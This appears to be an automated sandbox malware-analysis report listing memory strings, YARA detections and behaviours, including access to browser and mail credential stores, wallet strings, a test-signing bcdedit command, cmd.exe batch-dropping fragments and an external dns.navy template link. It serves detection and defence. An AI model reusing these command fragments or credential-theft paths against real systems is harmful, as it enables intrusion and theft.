Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: p,chrw(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9+)&chrw(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9+)
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (strreverse(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: p(strreverse(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ))execute
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &!#script:trojandownloader:vbs/totumu.a
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dimurl_jar,url_x86,url_amd64,url_jre,os,jar_path,jre_path,shellexecute,folder_parent
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: vdimurl_jar,url_x86,url_amd64,url_jre,os,jar_path,jre_path,shellexecute,folder_parent
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '!#scpt:trojandownloader:js/nemucod.orb3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 57708222a5d47044609256f51781760353e01731b204a0334164d50174b4e75147d79207132776d1873
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: u57708222a5d47044609256f51781760353e01731b204a0334164d50174b4e75147d79207132776d1873
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '!#scpt:trojandownloader:o97m/donoff.gb3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: exec("cmd.exe/c@echooff&ping2-n2&echo|s^et/p="".com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: uexec("cmd.exe/c@echooff&ping2-n2&echo|s^et/p="".com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .php"">>%appdata%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .ba^t")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '!#trojandownloader:o97m/slkinjec.ajk!a1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eexec("cmd.exe/cecho|set/p=""@echooff&wmicprocesscallcreate'msie"">%temp%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ueexec("cmd.exe/cecho|set/p=""@echooff&wmicprocesscallcreate'msie"">%temp%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#alf:exploit:o97m/cve-2017-11882.sm!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: c80d414a020000000b0000004551754154496f6e2e330000000000000000005a070000022b0e8502ff
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tc80d414a020000000b0000004551754154496f6e2e330000000000000000005a070000022b0e8502ff
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#scpt:exploit:o97m/cve-2011-1276.p!pra1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: eexec("cmd.exe/c@echooff&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: teexec("cmd.exe/c@echooff&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &echo|s^et/p=""xec/ihttp^:^/^/^
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "">>%temp%\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0.bat")
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#scpt:exploit:o97m/cve-2017-11882.bxk37
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: {\rtf78669887566447301105695@cmfp8mjhxsngl6goe@-rs2us5vyqiyxvabs<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: t{\rtf78669887566447301105695@cmfp8mjhxsngl6goe@-rs2us5vyqiyxvabs<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (!#scpt:exploit:o97m/cve-2017-11882.bxk43
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: {\rtf67890078666405815526827@jmpkkg0lyqhcmsed@-bld1gsxsj40mgr8jq<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: t{\rtf67890078666405815526827@jmpkkg0lyqhcmsed@-bld1gsxsj40mgr8jq<eh&&8_m-c_cc--_-s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: target="http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc"targetmode="external
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ttarget="http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc"targetmode="external
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: main"count="1"uniquecount="1"><si><t>c:\programdata\oiqaxidlsvg.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tmain"count="1"uniquecount="1"><si><t>c:\programdata\oiqaxidlsvg.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: main"count="1"uniquecount="1"><si><t>c:\programdata\ousojvcmueo.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tmain"count="1"uniquecount="1"><si><t>c:\programdata\ousojvcmueo.sct</t></si></sst>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )!#scpt:js/obfuscator.hex.array.symbolic.a
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ":(1,"\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s":(1,"\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9a-f"),"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ":(1,"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ':'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s':'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9a-f','
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z':'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ':(1,'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s':(1,'\x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-9a-f'),'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a-z':(1,'
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AE0C4 AllocateAndInitializeSid,FreeSid, 18_2_00007FF7E30AE0C4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AF884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError, 18_2_00007FF7E30AF884

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30A418C cpuid 18_2_00007FF7E30A418C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Code function: 10_2_00007FF69C508ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_00007FF69C508ED4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305F3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId, 18_2_00007FF7E305F3E8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AD874 RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError, 18_2_00007FF7E30AD874

Lowering of HIPS / PFW / Operating System Security Settings:

May enable test signing (to load unsigned drivers)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
AV process strings found (often used to terminate AV products)

Stealing of Sensitive Information:

Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Generic Dropper
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Mimikatz
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 1gPmnCR2PX.exe, 00000006.00000000.18137281855.0000000000426000.00000002.00020000.sdmp String found in binary or memory: CompanyNameAssoElectrum@
Source: 1gPmnCR2PX.exe String found in binary or memory: ElectronCash\wallets
Source: mpam-728dfe11.exe, 00000011.00000003.18607138179.0000027770048000.00000004.00000001.sdmp String found in binary or memory: 0B5Jaxx
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: secondexodusrealtors.co.ke
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: ETHEREUMSTRATUM
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\pkcs11.txt
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\pkcs11.txt
Yara detected Credential Stealer
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Remote Access Functionality:

Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Parallax RAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Valak
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Mini RAT
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Phorpiex smb component
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Codoso Ghost
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Growtopia
Source: Yara match File source: 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Contains VNC / remote desktop functionality (version string found)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Yara detected RemCom RemoteAdmin tool
Source: Yara match File source: 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18306864011.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Contains strings related to BOT control commands
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>